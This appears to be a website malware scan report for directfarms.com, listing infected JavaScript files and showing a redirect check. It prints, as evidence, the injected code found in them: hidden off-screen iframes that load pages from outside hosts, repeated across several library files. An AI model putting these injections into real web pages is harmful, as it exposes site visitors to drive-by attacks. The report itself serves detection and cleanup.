Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=directfarms.com
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://directfarms.com/ | 200 OK Content-Length: 19595 Content-Type: text/html | clean |
http://directfarms.com/media/system/js/caption.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
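Malicious code (confirmed by antivirus engines; see below): ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); The injected statement writes a 55x55 iframe positioned 550px off the left edge of the viewport, so the third-party page loads without being visible to the visitor. The same 177-byte response is returned for several script files in this report, including library files such as mootools-release-1.11.js and jquery.js that would normally be far larger, which suggests the original file contents were overwritten rather than appended to; such files need to be restored from a known-clean copy, not just edited to drop the injected line. Antivirus reports: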
| ||
http://directfarms.com/modules/mod_briaskISS/mod_briaskISS.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/templates/rt_hivemind_j15/js/mootools-release-1.11.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/templates/rt_hivemind_j15/js/rokslidestrip.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/templates/rt_hivemind_j15/js/rokmoomenu.js | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://directfarms.com/templates/rt_hivemind_j15/js/mootools.bgiframe.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/modules/mod_jw_ucd/mod_jw_ucd/jqueryfader/jquery.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/modules/mod_jw_ucd/mod_jw_ucd/jqueryfader/jquery.innerfade.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/index.php?option=com_content&view=article&id=2&Itemid=5 | 200 OK Content-Length: 33553 Content-Type: text/html | clean |
http://maps.google.com/maps?file=api&v=2.x&hl=en&key=ABQIAAAAF1lez-Jyth_NmpCwqyxCiRTwXth1xTD7Ha00zKAmimhVYtLmUxRclEU2ntnyKqqc4kN5fhR4pHxqmQ | 200 OK Content-Length: 4310 Content-Type: text/javascript | clean |
http://directfarms.com/index.php?option=com_phocagallery&view=categories&Itemid=4 | 200 OK Content-Length: 12625 Content-Type: text/html | clean |
http://directfarms.com/index.php?option=com_expose&Itemid=4&album=2 | 200 OK Content-Length: 15311 Content-Type: text/html | clean |
http://directfarms.com/components/com_expose/expose/swf/AC_RunActiveContent.js | 200 OK Content-Length: 177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/37.kr8sJdD0?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://directfarms.com/components/com_expose/expose/shadowbox/build/js/lib/yui-utilities.js | 200 OK Content-Length: 43405 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antivirus engines; see below). The excerpt shows the beginning of the YUI library code, cut off mid-token by the scanner, followed by the injected statement found in the same file: if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var A=arguments,E=null,C,B,D;for(C=0;C<A.length;C=C+1){D=A[C].split(".");E=YAHOO;for(B=(D[0]=="YAHOO")?1:0;B<D.length;B=B+1){E[D[B]]=E[D[B]]||{};E=E[D[B]];}}return E;};YAHOO.log=function(D,A,C){var B=YAHOO.widget.Logger;if(B&&B.log){return B.log(D,A,C);}else{return false;}};YAHOO.register=function(A,E,D){var I=YAHOO.env.modules;if(!I[A]){I[A]={versions:[],builds:[]};}var B=I[A],H=D.version,G=D.build,F=YA ;document.write('<iframe src="http://jnvzpp.sellClassics.com/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>'); Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://jnvzpp.sellclassics.com/geographicallyconquering.cgi?8 <iframe src="http://jnvzpp.sellclassics.com/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: directfarms.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 10 Jan 2015 19:23:26 GMT
Pragma: no-cache
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 19595
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 10 Jan 2015 19:23:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 53466f02f5a14f03d4a42aec4ecec6ce=f3ic2pqrg98fogqku212uuv0n5; path=/
X-Powered-By: PHP/5.2.17
...19595 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: directfarms.com
Referer: http://www.google.com/search?q=directfarms.com
Result:
The result is similar to the first query; no suspicious redirects were found.